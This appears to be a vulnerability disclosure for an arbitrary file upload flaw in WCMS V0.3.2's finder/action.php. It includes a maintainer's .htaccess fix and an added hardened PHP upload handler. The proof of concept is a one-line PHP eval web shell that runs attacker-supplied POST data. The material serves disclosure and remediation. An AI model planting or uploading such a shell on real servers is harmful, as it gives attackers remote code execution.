An Arbitrary File Upload Vulnerability in wcms/wex/finder/action.php
Affected software: WCMS V0.3.2
Type of vulnerability: Arbitrary File Upload
Discovered by: Yu Yang
Use this upload feature in the developer/finder:
and we can upload an arbitrary file to the web server, which allows attackers to upload malicious code
POC(2.php): <?php @eval($_POST[c]);?>
code:
I hope you can fix it.
Hello.
I have made some changes to the project structure. Now there is a public folder, where user files will be stored. In that folder I have added an .htaccess file that prevents execution of PHP code in the public folder. Maybe this is not an elegant fix, but it is quick and works well. I have only just started this fork, so I will fix the next issues when I have free time. https://github.com/cryptoprof/wcms/tree/feature/securityFix
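Blocking PHP execution in the upload folder, as described in the comment above, limits what an uploaded file can do; validating the upload on the server limits what can be stored in the first place. The following is an added example, not code from WCMS or from the fork. `store_upload()`, `UPLOAD_DIR`, `MAX_BYTES`, the allowlist and the `file` form field are assumptions made for illustration.

```php
<?php
// Added example, not WCMS code: a hardened upload handler.
// Hypothetical names: store_upload(), UPLOAD_DIR, MAX_BYTES, ALLOWED, form field 'file'.
declare(strict_types=1);

const UPLOAD_DIR = __DIR__ . '/public/uploads'; // assumed location of user files
const MAX_BYTES  = 5 * 1024 * 1024;             // assumed size limit

// Allowlist: extension => MIME type the file content must match.
const ALLOWED = [
    'jpg' => 'image/jpeg',
    'png' => 'image/png',
    'gif' => 'image/gif',
    'pdf' => 'application/pdf',
];

function store_upload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if (!is_uploaded_file($file['tmp_name']) || $file['size'] > MAX_BYTES) {
        throw new RuntimeException('invalid upload');
    }
    // The client-supplied name is only used to look up an allowlist key,
    // so extensions such as php, phtml or phar are rejected here.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        throw new RuntimeException('file type not allowed');
    }
    // The sniffed content type must agree with the claimed extension.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED[$ext]) {
        throw new RuntimeException('content does not match extension');
    }
    // Server-generated name: no client-controlled characters reach the path.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], UPLOAD_DIR . '/' . $name)) {
        throw new RuntimeException('could not store file');
    }
    return $name;
}

if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST' && isset($_FILES['file'])) {
    try {
        echo store_upload($_FILES['file']);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo $e->getMessage();
    }
}
```

The two controls are complementary: the allowlist rejects a `.php` upload such as the PoC above, and the execution block in the upload folder covers anything the validation misses.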